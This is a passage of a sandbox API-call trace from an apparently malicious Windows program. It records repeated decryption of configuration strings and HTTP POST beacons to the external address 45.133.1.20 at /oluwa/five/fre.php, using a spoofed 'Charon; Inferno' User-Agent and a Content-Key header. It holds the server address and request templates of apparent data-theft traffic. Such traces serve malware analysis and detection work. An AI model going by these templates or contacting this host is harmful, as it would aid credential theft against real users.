(HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0292.561] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0292.562] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0292.562] GetProcessHeap () returned 0x6a0000 [0292.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0292.562] GetProcessHeap () returned 0x6a0000 [0292.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0292.563] send (s=0xae4, buf=0x6bd460*, len=242, flags=0) returned 242 [0292.563] send (s=0xae4, buf=0x6bb998*, len=159, flags=0) returned 159 [0292.564] GetProcessHeap () returned 0x6a0000 [0292.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0292.564] recv (in: s=0xae4, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0292.632] GetProcessHeap () returned 0x6a0000 [0292.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0292.633] GetProcessHeap () returned 0x6a0000 [0292.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0292.635] GetProcessHeap () returned 0x6a0000 [0292.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d80b0 | out: hHeap=0x6a0000) returned 1 [0292.635] GetProcessHeap () returned 0x6a0000 [0292.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0292.636] closesocket (s=0xae4) returned 0 [0292.637] GetProcessHeap () returned 0x6a0000 [0292.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0292.637] GetProcessHeap () returned 0x6a0000 [0292.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0292.637] GetProcessHeap () returned 0x6a0000 [0292.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0292.638] GetProcessHeap () returned 0x6a0000 [0292.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0292.639] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1430) returned 0xae4 [0292.641] Sleep (dwMilliseconds=0xea60) [0292.643] GetProcessHeap () returned 0x6a0000 [0292.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0292.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.644] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.651] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0292.751] GetProcessHeap () returned 0x6a0000 [0292.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0292.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.769] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0292.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.771] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.772] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.772] GetProcessHeap () returned 0x6a0000 [0292.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0292.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.774] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0292.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.776] CryptDestroyKey (hKey=0x6ad020) returned 1 [0292.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.777] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0292.777] GetProcessHeap () returned 0x6a0000 [0292.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0292.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.778] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0292.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.779] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0292.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.780] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0292.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.781] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0292.781] GetProcessHeap () returned 0x6a0000 [0292.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0292.781] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0292.781] GetProcessHeap () returned 0x6a0000 [0292.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0292.781] GetProcessHeap () returned 0x6a0000 [0292.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0292.782] GetProcessHeap () returned 0x6a0000 [0292.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0292.782] GetProcessHeap () returned 0x6a0000 [0292.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0292.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.783] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.792] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0292.803] GetProcessHeap () returned 0x6a0000 [0292.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0292.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.804] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0292.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.807] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0292.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.809] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.809] GetProcessHeap () returned 0x6a0000 [0292.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0292.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.810] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0292.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.812] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0292.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.813] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0292.813] GetProcessHeap () returned 0x6a0000 [0292.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0292.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.814] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0292.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.815] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0292.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.817] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0292.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.823] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0292.823] GetProcessHeap () returned 0x6a0000 [0292.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0292.823] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0292.823] GetProcessHeap () returned 0x6a0000 [0292.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0292.823] socket (af=2, type=1, protocol=6) returned 0xae8 [0292.823] connect (s=0xae8, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0292.855] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0292.855] GetProcessHeap () returned 0x6a0000 [0292.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0292.855] GetProcessHeap () returned 0x6a0000 [0292.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9b20 [0292.855] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0292.856] wvsprintfA (in: param_1=0x6d9b20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0292.856] GetProcessHeap () returned 0x6a0000 [0292.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d82f0 [0292.856] GetProcessHeap () returned 0x6a0000 [0292.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0292.857] GetProcessHeap () returned 0x6a0000 [0292.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0292.857] GetProcessHeap () returned 0x6a0000 [0292.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9b20 [0292.858] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0292.858] wvsprintfA (in: param_1=0x6d9b20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0292.859] GetProcessHeap () returned 0x6a0000 [0292.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0292.859] GetProcessHeap () returned 0x6a0000 [0292.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0292.859] send (s=0xae8, buf=0x6bd460*, len=242, flags=0) returned 242 [0292.859] send (s=0xae8, buf=0x6bb998*, len=159, flags=0) returned 159 [0292.860] GetProcessHeap () returned 0x6a0000 [0292.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0292.860] recv (in: s=0xae8, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0292.939] GetProcessHeap () returned 0x6a0000 [0292.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0292.939] GetProcessHeap () returned 0x6a0000 [0292.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0292.940] GetProcessHeap () returned 0x6a0000 [0292.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d82f0 | out: hHeap=0x6a0000) returned 1 [0292.940] GetProcessHeap () returned 0x6a0000 [0292.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0292.940] closesocket (s=0xae8) returned 0 [0292.941] GetProcessHeap () returned 0x6a0000 [0292.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0292.941] GetProcessHeap () returned 0x6a0000 [0292.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0292.941] GetProcessHeap () returned 0x6a0000 [0292.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0292.942] GetProcessHeap () returned 0x6a0000 [0292.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0292.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1808) returned 0xae8 [0292.945] Sleep (dwMilliseconds=0xea60) [0292.965] GetProcessHeap () returned 0x6a0000 [0292.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0292.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.966] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.974] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0292.987] GetProcessHeap () returned 0x6a0000 [0292.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0292.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0292.989] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0293.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.001] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.002] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.002] GetProcessHeap () returned 0x6a0000 [0293.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0293.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.004] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0293.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.005] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0293.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.007] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0293.007] GetProcessHeap () returned 0x6a0000 [0293.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0293.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.011] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0293.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.012] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0293.013] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.014] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0293.015] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.015] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0293.015] GetProcessHeap () returned 0x6a0000 [0293.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0293.015] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0293.016] GetProcessHeap () returned 0x6a0000 [0293.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0293.016] GetProcessHeap () returned 0x6a0000 [0293.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0293.017] GetProcessHeap () returned 0x6a0000 [0293.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0293.017] GetProcessHeap () returned 0x6a0000 [0293.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0293.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.022] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.028] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0293.039] GetProcessHeap () returned 0x6a0000 [0293.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0293.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.040] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0293.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.044] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.045] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.046] GetProcessHeap () returned 0x6a0000 [0293.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0293.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.047] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0293.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.049] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0293.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0293.050] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0293.050] GetProcessHeap () returned 0x6a0000 [0293.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0293.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.052] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0293.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.056] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0293.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.057] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0293.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.058] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0293.058] GetProcessHeap () returned 0x6a0000 [0293.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0293.058] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0293.058] GetProcessHeap () returned 0x6a0000 [0293.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0293.059] socket (af=2, type=1, protocol=6) returned 0xaec [0293.059] connect (s=0xaec, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0293.083] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0293.083] GetProcessHeap () returned 0x6a0000 [0293.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0293.083] GetProcessHeap () returned 0x6a0000 [0293.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9b20 [0293.084] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0293.085] wvsprintfA (in: param_1=0x6d9b20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0293.085] GetProcessHeap () returned 0x6a0000 [0293.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d8470 [0293.085] GetProcessHeap () returned 0x6a0000 [0293.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0293.086] GetProcessHeap () returned 0x6a0000 [0293.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0293.086] GetProcessHeap () returned 0x6a0000 [0293.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9b20 [0293.087] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0293.088] wvsprintfA (in: param_1=0x6d9b20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0293.088] GetProcessHeap () returned 0x6a0000 [0293.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0293.088] GetProcessHeap () returned 0x6a0000 [0293.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: 